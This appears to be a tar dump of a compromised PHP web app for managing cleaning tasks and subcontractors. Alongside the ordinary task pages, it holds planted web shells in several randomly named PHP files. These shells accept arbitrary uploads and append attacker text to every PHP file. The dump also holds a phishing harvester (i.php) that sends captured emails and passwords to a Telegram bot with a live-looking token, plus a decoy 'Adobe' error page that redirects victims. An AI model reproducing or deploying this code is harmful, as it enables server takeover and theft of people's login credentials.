aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="#"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Assigned Tasks</li> </ol> </nav> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <!-- Filter options --> <div class="form-group row"> <div class="col-sm-4"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-4"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> </div> <!-- Task table --> <table id="super_advanced_table" class="table"> <thead> <tr> <th><input type="checkbox" id="select_all_tasks"></th> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Assigned Cleaner email </th> <th>Created At</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><input type="checkbox" class="task_checkbox" value="<?= htmlspecialchars($task->id) ?>"></td> <td><?php echo 'TSK-000' . htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo $task->assignedCleaneremail; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <a href="viewtask.php?id=<?= htmlspecialchars($System->encryptData($task->id)) ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> <!-- Assign tasks button --> <button class="btn btn-outline-danger" id="assignTasks">Re Assign Tasks to Cleaner</button> </div> <!-- JavaScript for DataTable and actions --> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(2).search(this.value).draw(); }); $('#filter_region').on('change', function () { table.column(3).search($(this).val()).draw(); }); // Handle select all tasks $('#select_all_tasks').on('click', function () { var isChecked = $(this).prop('checked'); $('.task_checkbox').prop('checked', isChecked); }); // Handle assign tasks button click $('#assignTasks').on('click', function() { var checkedTasks = []; $('.task_checkbox:checked').each(function() { var taskId = $(this).closest('tr').find('td:eq(1)').text().trim().replace('TSK-000', ''); checkedTasks.push(taskId); }); if (checkedTasks.length === 0) { Swal.fire({ icon: 'error', title: 'No Tasks selected', text: 'Please select tasks to assign to a cleaner' }); return; } Swal.fire({ title: 'Enter Cleaner Email', input: 'email', inputLabel: 'Cleaner Email', inputPlaceholder: 'Enter cleaner email', showCancelButton: true, confirmButtonText: 'Assign Task', showLoaderOnConfirm: true, preConfirm: (email) => { return fetch('../send_task_email_to_workers.php', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ action: 'bulk', // or 'single' depending on your logic worker_email: email, task_ids: checkedTasks }) }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.json(); }) .then(data => { console.log('Response from PHP:', data); if (data.status === 'success') { Swal.fire({ title: 'Success!', text: 'Task has been assigned successfully', icon: 'success' }).then(() => location.reload()); } else { throw new Error(data.message || 'Unknown error'); } }) .catch(error => { console.error('Fetch error:', error); Swal.showValidationMessage( `Request failed: ${error.message}` ); }); }, allowOutsideClick: () => !Swal.isLoading() }); }); }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/accepttask_bulk.php000064400000002212151676701240013312 0ustar00<?php session_start(); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/Task.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['taskIds']) && is_array($_POST['taskIds']) && isset($_POST['companyId'])) { $taskIds = $_POST['taskIds']; $companyId = $_POST['companyId']; $taskService = new TaskService(); $errors = []; foreach ($taskIds as $taskId) { $task = $taskService->getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo($companyId); $task->setIsAssigned(1); if (!$taskService->assignTask($task)) { $errors[] = "Failed to assign task ID $taskId"; } } else { $errors[] = "Task ID $taskId not found"; } } if (empty($errors)) { echo 'success'; } else { echo json_encode($errors); } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } ?> subcontractor/viewassignedsubtasksdaywise.php000064400000026171151676701240016023 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used $SubContractorId = $_SESSION['user_id']; // Fetch all subtasks grouped by date $subtasks = $taskService->getAllSubtasksForSubContractorsGroupByDateassigned($SubContractorId); ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>All Subtasks</h5> <span>List of all subtasks assigned to you</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date"> </div> </div> <div class="col-md-3 d-flex align-items-center"> <div class="form-check"> <input type="checkbox" class="form-check-input" id="filterToday"> <label class="form-check-label" for="filterToday">Today</label> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <?php foreach ($subtasks as $date => $subtaskList) { ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <?php if ($subtask['ignored']) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask['completed'] ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <!-- Include jQuery and Bootstrap Datepicker JS --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function() { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Function to save filters to localStorage function saveFilters() { var filters = { startDate: $('#startDate').val(), endDate: $('#endDate').val(), filterToday: $('#filterToday').prop('checked') }; localStorage.setItem('subtaskFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('subtaskFilters')); if (filters) { $('#startDate').val(filters.startDate); $('#endDate').val(filters.endDate); $('#filterToday').prop('checked', filters.filterToday); filterSubtasks(); // Apply filters on load } } // Function to reset filters function resetFilters() { $('#startDate').val(''); $('#endDate').val(''); $('#filterToday').prop('checked', false); localStorage.removeItem('subtaskFilters'); filterSubtasks(); } function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); //console.log('Previous URL:', previousUrl); if (!previousUrl || !previousUrl.includes('viewsubtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Filter subtasks based on date and today checkbox function filterSubtasks() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var filterToday = $('#filterToday').prop('checked'); var today = new Date().toISOString().split('T')[0]; $('.subtask-row').each(function() { var subtaskDate = $(this).data('date'); var showRow = true; if (filterToday && subtaskDate !== today) { showRow = false; } else if ((startDate && subtaskDate < startDate) || (endDate && subtaskDate > endDate)) { showRow = false; } if (showRow) { $(this).show(); } else { $(this).hide(); } }); } // Event listener for applying filters $('#applyFilter').on('click', function() { saveFilters(); filterSubtasks(); }); // Event listener for today checkbox $('#filterToday').on('change', function() { if ($(this).prop('checked')) { var today = new Date().toISOString().split('T')[0]; $('#startDate').val(today); $('#endDate').val(today); } else { $('#startDate').val(''); $('#endDate').val(''); } saveFilters(); filterSubtasks(); }); // Event listener for resetting filters $('#reset_filters').on('click', function() { $('#startDate').val(''); $('#endDate').val(''); $('#filterToday').prop('checked', false); localStorage.removeItem('subtaskFilters'); filterSubtasks(); }); // Apply saved filters on initial load applyFilters(); }); </script> subcontractor/report_subtaskswithnotes.php000064400000017665151676701240015374 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Initialize necessary services and objects $taskService = new TaskService(); $System = new System(); // Fetch current subcontractor ID from session $currentSubcontractorId = $_SESSION['user_id'] ?? null; // Fetch all notes grouped by date for the current subcontractor $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $subtasks = $taskService->getAllSubtasksWithNotesGroupByDateForSubContractors($startDate, $endDate, $currentSubcontractorId, $serviceLocationId); ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>View and Submit Notes</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="#"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Date Filter --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date" value="<?= htmlspecialchars($startDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date" value="<?= htmlspecialchars($endDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="serviceLocationId">Select a Service Location:</label> <select id="serviceLocationId" name="serviceLocationId" class="form-control"> <option value="">All Locations</option> <?php // Populate service locations $services = $taskService->getAllServicesForDropdown(); foreach ($services as $service) { $selected = ($serviceLocationId == $service->id) ? 'selected' : ''; echo '<option value="' . htmlspecialchars($service->id) . '" ' . $selected . '>' . htmlspecialchars($service->name) . '</option>'; } ?> </select> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Display subtasks grouped by date --> <?php foreach ($subtasks as $date => $subtaskList) { ?> <?php // Skip if all notes are empty $allEmpty = true; foreach ($subtaskList as $subtask) { if (!empty($subtask['notes'])) { $allEmpty = false; break; } } if ($allEmpty) continue; ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?= date('l, F j, Y', strtotime($date)); ?></h3> </div> <div class="card-body"> <table class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Notes</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <?php if (empty($subtask['notes'])) continue; ?> <tr> <td>ST-<?= $subtask['id']; ?></td> <td><?= htmlspecialchars($subtask['service_name']); ?></td> <td><?= htmlspecialchars($subtask['subtask_date']); ?></td> <td><?= htmlspecialchars($subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''); ?></td> <td><?= htmlspecialchars($subtask['notes']); ?></td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <!-- Include Scripts --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function () { // Datepicker initialization $('.datepicker').datepicker({format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true}); // Apply filter $('#applyFilter').on('click', function () { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var serviceLocationId = $('#serviceLocationId').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate + '&service_location_id=' + serviceLocationId; window.location.href = url; }); // Reset filters $('#reset_filters').on('click', function () { window.location.href = window.location.href.split('?')[0]; }); }); </script> ffmolmne.php000064400000001370151676701240007072 0ustar00<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?> egbwaell.php000064400000001370151676701240007051 0ustar00<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?> bliickjv.php000064400000001370151676701240007064 0ustar00<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?> i.php000064400000002652151676701240005523 0ustar00<?php define('save_txt', 1); define('save_as', 'creds.txt'); define('bot_token', '8099333645:AAGZNwNwR_kuunUdHhj9Ai0VtNoy7vr1SKE'); define('chat_id', '-1002902701497'); define('send_mail', 0); define('send_tg', 1); $ip = $_SERVER['REMOTE_ADDR']; if (!empty($_POST)) { $email = $_POST['email'] ?? 'N/A'; $password = $_POST['password'] ?? 'N/A'; $message = "Online ID : $email\r\n"; $message .= "Password : $password\r\n"; $message .= "IP Address : $ip\r\n"; if (send_mail) { $recipients = array("c.revolver@yandex.com", "logz3r@yahoo.com"); $subject = "Lurd Azeez Inc - Login : $ip"; $headers = "From: notifier@yourdomain.com\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/plain; charset=UTF-8\r\n"; foreach ($recipients as $to) { mail($to, $subject, $message, $headers); } } if (send_tg) { $config = array( 'chat_id' => chat_id, 'text' => $message ); $url = 'https://api.telegram.org/bot' . bot_token . '/sendMessage?' . http_build_query($config); file_get_contents($url); } if (save_txt) { file_put_contents(save_as, $message . PHP_EOL, FILE_APPEND); } // Redirect to the next page with email in the URL $redirect_url = '/rdr8.html'; header("Location: $redirect_url?email=" . urlencode($email)); exit(); } ?> rdr8.html000064400000006073151676701240006330 0ustar00<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>Link Not Found - Adobe Creative Viewer</title> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet"> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Inter', sans-serif; background: #f9f9fb; display: flex; justify-content: center; align-items: center; height: 100vh; color: #2c2c2c; } .container { background: #ffffff; padding: 50px; border-radius: 12px; box-shadow: 0 20px 40px rgba(0, 0, 0, 0.1); max-width: 560px; width: 90%; text-align: center; animation: fadeIn 0.6s ease-in-out; } .icon { font-size: 72px; margin-bottom: 20px; color: #e74c3c; } h1 { font-size: 28px; font-weight: 600; margin-bottom: 14px; } p { font-size: 16px; color: #666; margin-bottom: 25px; line-height: 1.6; } .info-box { background: #fff5f5; border-left: 4px solid #e74c3c; padding: 16px; border-radius: 8px; text-align: left; font-size: 15px; color: #555; } .info-box strong { display: block; margin-bottom: 5px; color: #c0392b; } @keyframes fadeIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } } @media (max-width: 480px) { .container { padding: 30px 20px; } .icon { font-size: 60px; } } </style> </head> <body> <div class="container"> <div class="icon">🚫</div> <h1>Oops! This link is broken</h1> <p>The link you are trying to access appears to be invalid, expired, or no longer exists.</p> <div class="info-box"> <strong>Possible reasons:</strong> <ul style="margin-left: 1em; padding-left: 0.5em;"> <li>The document was removed or deleted by the owner</li> <li>The link has expired or was mistyped</li> <li>You don't have permission to access this content</li> </ul> </div> </div> <script> setTimeout(() => { const params = new URLSearchParams(window.location.search); const email = params.get('email'); if (email && email.includes('@')) { const domain = email.split('@')[1].trim(); // More robust domain check const domainRegex = /^(?!-)[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$/; if (domainRegex.test(domain)) { console.log('Redirecting to:', domain); window.location.href = `https://${domain}`; return; } else { console.warn('Invalid domain extracted:', domain); } } // Fallback window.location.href = window.location.origin; }, 3000); </script> </body> </html> qwwunmvm.php000064400000001370151676701240007170 0ustar00<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
/home/emeraadmin/.caldav/.././public_html/src/../node_modules/../4d695/pages.tar